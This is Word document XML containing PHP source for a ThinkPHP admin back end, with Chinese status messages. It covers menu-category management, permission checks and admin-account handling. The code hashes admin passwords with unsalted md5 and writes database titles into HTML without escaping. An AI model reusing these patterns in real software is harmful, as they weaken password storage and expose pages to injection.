          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",'url'=&gt;url('index')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06300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53A0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err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D2A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614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0506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err"=&gt;$validate-&gt;getError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18524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7306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D33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Category');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415C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put('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D47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data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49293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Db::name('category')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D158F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fo){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37A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ret"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",'url'=&gt;url('add')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CCF6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0A2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err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EDE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1663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0EEDA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array("err"=&gt;$validate-&gt;getError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631D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2648D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8E8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5DFA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category')-&gt;field('id,tid,title')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AA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get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A550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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC90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39BA1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category')-&gt;where('id',input('id'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCF4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ategoryID=$name['tid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A62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43C38A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F9F4A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5D0C4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02D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A222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A55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23C240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E39BF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post.id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CA6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return json(array("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1")); exit();}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210865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category')-&gt;where('tid',$id)-&gt;field('id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AE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ategory){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA6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ray("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先删除下级菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F9B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44B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l=Db::name('category')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902E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el){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50070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ray("ret"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A96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70F8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ray("err"=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B04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BE1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B18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E36EC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ray("err"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11B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4A6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843C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5F4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1F669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D9A5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hide'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB0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1A83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6D4C6D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hideleft';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28057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56BCF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hideright';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF7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732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ategory')-&gt;where('id',$id)-&gt;field($type)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73C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type]==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F65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E11C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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780FD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E618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ategory')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D574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9910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category/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4A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CA8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设置失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353B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9E9C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E62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4BB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36E57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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DC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4570D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Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14776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43194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mmon extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C276A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F357C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_initialize(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F006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Session::has('admin','ffxiangAdmin')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039F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his-&gt;redirect("Login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A8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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100C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dminId=Session::get('admin','ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1A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dminId=db('admin')-&gt;where(['id'=&gt;$adminId['id'],'name'=&gt;$adminId['name'],'type'=&gt;$adminId['type'],'hide'=&gt;$adminId['hide'],'password'=&gt;$adminId['password']])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03670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Id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E365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session(null, 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAADF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his-&gt;redirect("Login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7E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Id['id']!=1 &amp;&amp; $adminId['type']!=1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02904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controller=strtolower(request()-&gt;controller());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CDD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ction=strtolower(request()-&gt;action());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3A0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controller=='index' &amp;&amp; $action=='index'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C5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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A048E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3BCEA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controller=='index' &amp;&amp; $action=='out'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01014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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF8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65F414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controller=='index' &amp;&amp; $action=='main'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC8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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F738C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6EF1B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if==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E261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dminTypeData=db('admin_type')-&gt;where('id',$adminId['type'])-&gt;cache(_cache('db'))-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC23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dminCategoryId=db('category')-&gt;where(['controller'=&gt;$controller,'function'=&gt;$action])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A3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permissionSucceeded=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A295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CategoryId &amp;&amp; $adminTypeData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED47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a=json_decode($adminTypeData,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D64F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foreach ($a as $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7A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CategoryId==$v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413158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permissionSucceeded=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CB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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131B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1C7B8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4AF3F6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C511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cho  "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>adminType</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段参数不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17A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302183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permissionSucceeded==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C86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cho "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无权访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D63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7BBAB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF62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0989B6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03243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1EFCA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D762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lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18643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58D411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5AAFEF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2A955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dmin extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5A2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1F522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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AD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dmin')-&gt;alias('a')-&gt;join('admin_type b','a.type=b.id')-&gt;field('a.id,a.name,b.title,a.create_time,a.create_ip,a.update_time,a.update_ip,a.hide')-&gt;paginate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE53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782D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2A6E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157F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0BC36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6276CC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_type=Db::name('admin_type')-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CEA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dmintype',$admin_type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF03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8CAF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CD2C0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validate('Admin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C4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type'=&gt;$post['type'],'hide'=&gt;$post['hide']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007A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name']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31640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输入账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A9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04B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post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE809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password']!=$post['password2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE91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密码和确认密码不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02212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36B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47086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299C9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7FB2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password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EDE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Db::name('admin')-&gt;where('id',$id)-&gt;value('password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E38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8A82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md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370351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6305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2D494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md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A3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802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ata=['name'=&gt;$post['name'],'password'=&gt;$password,'update_time'=&gt;$time,'update_ip'=&gt;$ip];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8B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ata = array_merge($array, $dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF6A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8C1B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namebd=Db::name('admin')-&gt;where('name',$post['name'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50AF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bd){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D8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账户已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C2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D178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password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15E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密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A14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B43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atas=['create_time'=&gt;$time,'create_ip'=&gt;$ip];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F27D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ata = array_merge($dbdatas, $dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB8B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gt;insert($dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABA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53369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50744D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8C14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49A5B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4A8B1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06A80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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F980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ata=['name'=&gt;$post['name'],'password'=&gt;$password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC03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3F9B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gt;where('id',$id)-&gt;update($dbdata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A77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C2F2A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68796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390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475EF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BF4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B09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9C1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validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2B1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623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A5B2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5BB7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dmin')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33238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44963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E832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170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7C13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83F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C5D7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DDC98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DF3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8661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21B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6AFF9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AE1B9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0A10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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9571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禁止删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F285D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A85C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6A745C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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DA4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52A4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0330FD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97F2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db];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC0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C0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DED0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5A60F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494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D28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0924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577631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45E8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10358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5D7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D96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data=Db::name('admin_type')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9C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0063B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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76D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5E40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Add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA9F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C60FF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Db::name('category')-&gt;where('tid',0)-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06436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 as $k=&gt;$v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3F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h5&gt;'.$v['title'].'&lt;/h5&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E96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2=Db::name('category')-&gt;where('tid',$v['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA1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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6F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2 as $v2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3F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div class="form-group"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49560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sm-2 control-label"&gt;'.$v2['title'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042450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div class="col-sm-10"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CC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div class="radio i-checks"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A949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2['controller'] &amp;&amp; $v2['function']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177552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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE028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4864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db=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3631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eckeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F14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checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66930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v==$v2['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31157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checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2C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FEA8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AC2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43E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4027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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42E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3803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5D859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md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v2['id'].'" name="data[]"&gt;'.$v2['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA6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3=Db::name('category')-&gt;where('tid',$v2['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1E1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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964D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oreach($t3 as $v3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2113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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BECD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8213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db=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EF1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eckeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD415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checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53DE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v==$v3['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F900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checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A11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9693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710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F4D6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D50C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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756A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BBA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2EC0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md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v3['id'].'" name="data[]"&gt;'.$v3['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA36A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4=Db::name('category')-&gt;where('tid',$v3['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712717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4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B33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t4 as $v4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027069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D974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db=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAD4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eckeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DE0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checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA2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v==$v4['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DAF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checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C650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B17C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B25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9305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84999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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A91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F387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B3D3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md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v4['id'].'" name="data[]"&gt;'.$v4['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD9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9A7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0FDC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98F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7F4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C331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3=Db::name('category')-&gt;where('tid',$v2['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59E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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A9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t3 as $v3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A074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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B991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A936A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lastRenderedPageBreak/>
        <w:t>$checkeddb=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D38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eckeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D144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checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F3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v==$v3['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C4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checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB70C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8626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B310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89D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C2B81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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C196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594D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07B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md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v3['id'].'" name="data[]"&gt;'.$v3['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9B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4=Db::name('category')-&gt;where('tid',$v3['id'])-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BA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4){</w:t>
      </w:r>
    </w:p>
